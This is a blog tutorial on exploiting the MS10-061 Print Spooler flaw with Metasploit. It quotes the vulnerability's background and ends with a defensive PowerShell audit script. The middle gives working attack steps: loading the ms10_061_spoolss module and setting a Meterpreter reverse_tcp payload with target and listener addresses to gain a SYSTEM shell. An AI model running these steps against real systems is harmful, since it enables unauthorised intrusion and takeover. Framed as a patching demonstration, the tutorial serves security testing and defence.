Exploiting MS10-061 Print Spooler Service Vulnerability with Metasploit
By now you may or may not have heard from Microsoft about the MS10-061 vulnerability that was announced earlier this week. It's a vulnerability in the Print Spooler service that could allow Remote Code Execution on XP, 2003, Vista, 2008, 7, and 2008 R2. It's marked by Microsoft as critical, and they advise you patch straight away.
This security update resolves a publicly disclosed vulnerability in the Print Spooler service. The vulnerability could allow remote code execution if an attacker sends a specially crafted print request to a vulnerable system that has a print spooler interface exposed over RPC. By default, printers are not shared on any currently supported Windows operating system.
This security update is rated Critical for all supported editions of Windows XP, and Important for all supported editions of Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. For more information, see the subsection, Affected and Non-Affected Software, in this section.
The security update addresses the vulnerability by correcting the manner in which the Printer Spooler service validates user permissions. For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.
Until a few days back, there were no exploits yet available for it - but Metasploit has just released one (wonderful work guys). I'm going to borrow a few images from the Metasploit blog for now, as I don't have time to whip up my own, but here's a tutorial on how to exploit it to prove to the IT guys that they need to roll out the patches and reboot those servers :) So credits to Metasploit.com for the images! They had this to say about the exploit:
In its most egregious form, this bug allowed a guest user with print access to write arbitrary content to arbitrary files with SYSTEM privileges. That's pretty bad. However, the problem is, what should one write to to achieve code execution?
There haven't been a great deal of these types of vulnerabilities in the past. There are some ActiveX bugs where you could write a file, but the methods used to exploit those don't fit this situation. Most of those were exploited in ways that required user interaction (ie, writing to the "Startup" directory). One even takes advantage of an IE specific feature (hcp:// URI handling). However, these methods either won't work or will take an undetermined amount of time to complete :-/
We discussed writing directly to the Tasks directory, but decided against it early on. The number of fields in the job file format, especially the job signature, scared us away.
After some brainstorming, crowd-sourcing, and intense discussion, HD came up with a very interesting technique. He found that you could, thanks to a Windows-ism, connect to a local named pipe and send data. Most RPC calls require reading a policy handle and passing it in another call. However, after a bit of MSDN searching, HD found the NetrJobAdd RPC call. This call doesn't require a policy handle, only job parameters. A successful call to it schedules a command to be executed at a specified time. Turns out, the hardest part is picking the right time. Of course, we could brute force it, but... we don't have to! SMB, the protocol over which the printer is accessed, conveniently provides the "SystemTime" and "ServerTimeZone" during negotiation! Perfect!
- Share the printer on the target system (or, for an audit, assume the target is shared - think AD server or print server...)
- If you don't have an authorised account to access the system, you will need to ensure that "Simple File Sharing" is enabled. Just go to "File and Folder Options" in explorer, and enable it:
- Fire up your copy of Metasploit, and type: use exploit/windows/smb/ms10_061_spoolss
- Set yourself a payload of your choice - I used my personal favourite, Meterpreter: set payload windows/meterpreter/reverse_tcp
- Type "show options" to see your available options, and "set" for each one. For example, to set the option "PNAME", you type "set PNAME SoxThePrinter". Fill in your target under RHOST, your own IP under LHOST, and any other options you like. It should look like this:

- Now, type the magical word "exploit", and watch the following happen (sorry for the lack of consistency - I don't have an environment right here where I can exploit a print server, so I've borrowed Metasploit.com's image of success):

- On the target, type "at" to see if your task is scheduled to run:

- Once it hits that time, "bam", and the SERVICE privilege shell is yours! That's higher than administrator :)
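For the IT guys on the receiving end of this demo, here is a small PowerShell audit I've added (my own addition, not code from the original post or from Metasploit) that checks the three things the attack hinges on: whether the Print Spooler service is up, whether any printer is actually shared (the exploit needs one, and Microsoft notes none are shared by default), and what AT jobs are currently queued, which is what the "at" step above looks at. It assumes Windows PowerShell running elevated on the print server or domain controller, and uses the standard WMI classes Win32_Service, Win32_Printer and Win32_ScheduledJob.

```powershell
# Added audit script (not from the original post or Metasploit).
# Assumes: elevated Windows PowerShell on the host you want to check.

# 1. Print Spooler service state. If the box never prints, stopping and
#    disabling the service removes the RPC interface the bug lives in.
$spoolerSvc = Get-WmiObject -Class Win32_Service -Filter "Name='Spooler'"
if ($spoolerSvc) {
    "Print Spooler: State=$($spoolerSvc.State) StartMode=$($spoolerSvc.StartMode)"
} else {
    "Print Spooler service not present on this host."
}

# 2. Shared printers. The attack path in the post requires a shared printer,
#    so every entry here is a host that needs the MS10-061 patch first.
$sharedPrinters = Get-WmiObject -Class Win32_Printer | Where-Object { $_.Shared -eq $true }
if ($sharedPrinters) {
    "Shared printers:"
    $sharedPrinters | Select-Object Name, ShareName, PortName | Format-Table -AutoSize
} else {
    "No shared printers on this host."
}

# 3. AT-style scheduled jobs (the same list the 'at' command shows).
#    A job you did not create, pointing at an odd executable, is worth a look;
#    the technique above schedules its payload exactly this way.
$atJobs = Get-WmiObject -Class Win32_ScheduledJob
if ($atJobs) {
    "Scheduled AT jobs:"
    $atJobs | Select-Object JobId, Command, StartTime, Owner | Format-Table -AutoSize
} else {
    "No AT jobs scheduled."
}
```

Run it before and after patching and rebooting: the spooler state and share list tell you whether the host was exposed at all, and an empty AT job list after cleanup is the sanity check that nothing from the demo is still waiting to fire.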
And so concludes this tutorial. Hope you enjoyed it :) Stay patched!